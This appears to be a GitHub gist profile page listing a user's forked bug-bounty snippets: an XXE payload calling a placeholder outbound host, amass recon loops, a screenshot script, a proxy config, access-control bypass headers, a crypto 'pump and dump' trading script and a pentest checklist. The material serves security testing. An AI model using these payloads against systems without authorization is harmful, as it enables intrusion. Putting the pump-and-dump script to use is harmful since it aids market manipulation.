Skip to content

Instantly share code, notes, and snippets.


JeffreyShran JeffreyShran

View GitHub Profile
JeffreyShran / XXE_payloads
Created December 4, 2019 16:15 — forked from staaldraad/XXE_payloads
XXE Payloads
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
JeffreyShran /
Created February 21, 2020 10:31 — forked from jhaddix/
copy in to this script and get amass command
expand $1 |cut -d " " -f1|sed 's/AS//g'
echo ""
echo ""
lined=`expand $1 |cut -d " " -f1|sed 's/AS//g'| tr '\n' ','`
JeffreyShran / amass_intel_for_loop
Created February 21, 2020 10:31 — forked from jhaddix/amass_intel_for_loop
Foir loop to run amass intel for easy killing of single thread
View amass_intel_for_loop
for i in $(cat yahoobgp); do echo""; echo "ASN $i";echo ""; amass.netdomains -asn $i;echo ""; done
JeffreyShran /
Created February 21, 2020 10:38 — forked from gbedoya/
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
JeffreyShran /
Created June 16, 2020 11:04 — forked from si9int/
Performing screenshots on URLS given via STDIN. Chromium and Chromedriver required! Configuration infile.
#!/usr/bin/env python3
# v.0.1 - by SI9INT (
# Chromium and chromedriver required, be sure to check if both version are the same
# `mkdir screens` to get started, script won't create the folder
import queue, threading, sys
from selenium import webdriver
from import Options
CHROME_PATH = '/usr/bin/chromium'
JeffreyShran / bb-foxyproxy-pattern.json
Created June 24, 2020 09:30 — forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
View bb-foxyproxy-pattern.json
"30523382": {
"className": "Proxy",
"data": {
"bypassFPForPAC": true,
"color": "#f57575",
"configUrl": "",
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
"cycle": false,
"enabled": true,
JeffreyShran /
Created February 21, 2021 14:42 — forked from talesa/
Short script to for pump and dumps, you have to execute this code line by line so use `jupyter notebook` or `hydrogen` inside `atom` editor
# you have to execute this code line by line so use jupyter notebook or hydrogen inside atom editor
# import libraries
import ccxt
from datetime import datetime
# create exchange API handle
exchange = getattr(ccxt, 'binance')()
# paste in your API key and secret here (if you're afraid they're gonna get stolen, inspect the ccxt library open source code on github)
exchange.apiKey = ''
View 403_401_oauth_HeadersBypass.txt
Content-type: 0
Forwarded: for=
JeffreyShran /
Created November 24, 2021 15:17 — forked from MrMugiwara/
Network Security VAPT Checklist

Hi dear reader, there are very few technical network security assessment checklist. So I thought to share my own on this. Have a look and enjoy. Lets talk about the scope first. If you are given a 1000 machines to perform VAPT, then here is your scope. Single machine can have 65535 ports open. Any single port can deploy any service software from the world. For example FTP can be run on smartftp, pureftpd etc.. Any single FTP software version (for example pureftpd 1.0.22) can have number of vulnerabilities available. So if you multiply all of these, then it is impossible for any auditor to go ahead and probe all ports manually and find services manually. Even if he/she is able to do it, it is impossible to check all vulnerabilities that are pertaining to a single port of a single machine. Hence we have to rely on scanners such as nexpose, nessus, openvas, coreimpact etc. Here are some quick tools and test cases that one can perform on commonly found ports in the network pentest.

Identify live host